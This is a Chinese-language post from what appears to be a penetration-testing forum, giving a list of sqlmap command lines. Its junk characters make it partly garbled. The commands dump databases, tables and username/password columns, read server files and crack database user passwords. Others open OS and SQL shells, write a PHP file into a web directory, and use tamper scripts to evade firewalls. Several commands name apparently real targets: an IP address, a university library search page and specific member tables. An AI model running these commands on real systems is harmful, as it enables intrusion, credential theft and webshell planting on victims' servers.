中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap9 `  x% x6 z! |& n) d2 O

  w6 r* w9 O6 d) [update :::::>     in the folder   after  execute    following   order : svn update6 [$ Y% p  _% I) v) h8 ]
( W  F5 O" I& m, L9 s" k* ^
sqlmap.py -r 1.txt --current-db
& I) |0 H7 v1 n- q
" H# l. f7 L4 s# }2 C0 w0 t' xv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
, d; i# n& e, h  j- r$ n/ g3 b/ }
3 o8 q' M3 n: A" k' }* ?, G- h3 g==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
8 {- v) N9 A  m. W7 ^5 r1 K猜解数据库
; r, u, W; E$ f1 ?3 F./sqlmap.py -u "injection-url" --dbs! U4 f8 K2 u  x3 C5 G  z
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
" ^* |; _1 A" q: a$ M/ j0 o- w  h0 g! T# `( I, c* R
猜解表名
! W$ ?7 k3 j  H% N% a9 A" o./sqlmap.py -u "injection-url" -D database_name --tables
% O7 W3 a7 I* t* p/ P, C- O
$ c- E) n+ u( q- _% n' T* d" s2 [sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"3 K% h. ]4 L; }+ u4 \+ O
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
6 b, J! M- P! r/ y5 B  a0 L3 v) i$ j7 o& t# m$ Q, B4 T1 N
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
+ v& Y+ C7 I; O. z( b% T% ~6 Y" A1 p' F6 q$ N
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
' E! P, L4 Q& K4 z% J) O2 ?. msqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
& I: F& q5 p! V4 ?$ ~8 _5 k0 ]' @sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% c. u% j$ q; N0 \2 Jsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"* O! e1 M  d1 z( H* S, T

% ?3 c4 j( q# \3 jsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"0 h# M$ _4 }" B7 H% I
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"5 n8 w. l7 F! |8 ~" J: V- a: K
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"+ @+ p3 K# ]! o6 _' v# X
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
# q2 A# X6 Y4 H. m: c7 Psqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump9 C6 u6 L' s4 ~' y3 s

2 `. [8 ?# E1 @- t: {( wsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了9 a% [; S! b8 r7 G' q, J' V
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
! b; n% \& x$ Q/ j4 u0 u2 X1 q1 E; K" m; _
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"2 i$ X5 D( t( i; m( c8 `6 u7 F& O
猜解列名; r9 P( \% n( Q9 v# G
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
! A2 i' t/ ^; e9 S) _  r/ e( y# J  G: }' A2 G
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( j) P, R* k' O" P2 y3 N4 r  R5 X/ H7 vsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ( X( X* D& P4 ~6 O# }! p
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
4 A7 t1 T% L& J& V! @9 k
+ x3 C+ X, d( F+ Lsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
* v* A5 c  `( R1 Y$ n5 y&submit=Go
: K* e2 j/ d$ ]7 Y: D7 n  K猜解值2 J3 I: o' M  d! F+ w) \1 O
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump4 Y6 }9 z' a: q/ n5 e9 d
========================================================
( }; b% g4 u3 x! g; P3 C搜索表名中包括mana字符的3 z9 o9 }, \6 s9 ~7 E
/sqlmap.py -u "injection-url" -T mana --search: N; d' l4 X7 S2 Q" b3 q
返回一个交互式sql shell' o5 h. p9 C* X1 n% X- ]1 }
/sqlmap.py -u "injection-url" --sql-shell
8 H; i5 v8 b3 z6 H6 N3 o7 k读取指定文件(需权限)
, [8 ]5 q$ T& N+ k0 q! E* \/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"3 K7 N& D7 n# J; e% T. G, J
查看当前 用户 及 数据库
  c# a' `$ y3 y) t/ Q( k! o, z/sqlmap.py -u "injection-url" --current-user --current-db
% c0 E$ ?( Y. O& w* h' ^; s, R本地文件 写入 远程目标绝对路径
- f# f9 Q8 E+ [6 s/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
: [; V2 l* P; v6 V( q# ^% lsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 9 K& W+ y- S' m6 U2 Y

" o2 A4 ]) c. Q$ c; x, D8 {sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径- `6 g8 j% L+ R9 g0 N9 G
查看某用的权限0 o; n' i4 A8 Y- R5 m  A- B/ E
/sqlmap.py -u "injection-url" --privileges -U root; C5 G0 x$ C' h1 U2 N5 y9 O6 I/ P. H
查看当前用户是否为dba) X8 e3 o. P7 N- {  U" F
/sqlmap.py -u "injection-url" --is-dba
" j( ]" H7 L$ X  z3 @读取所有数据库用户或指定数据库用户的密码/ K; P! p; }+ I8 _4 k7 i
sqlmap.py -r 1.txt --users --passwords9 M  M' z' [  A
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ) M5 T1 R6 H& [+ [* q6 w0 l3 b4 D

( W; f) g. W# Q$ X1 }/sqlmap.py -u "injection-url" --passwords -U root. m+ m5 Y* q- }

/ C# ?# f7 r5 o* v--start&&--stop 与 --first&&--last 的区别4 m0 T* @+ W1 m3 N" v; P$ O
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)# g) ]: T1 {2 B* n
% D  v" G/ u9 k3 P& T# t3 v
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)- q4 Q% d& T: l) ?( K
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables6 e" t1 r9 Q6 _3 a1 s
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
6 X( W, c8 N" \  x& d/ r0 F7 [# M, R3 ]* O
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)) c% F1 t! y$ d
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"% x$ [( W; V2 a# z  P# d, y4 Y- ]

  u, p: V% R' d& R8 c




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2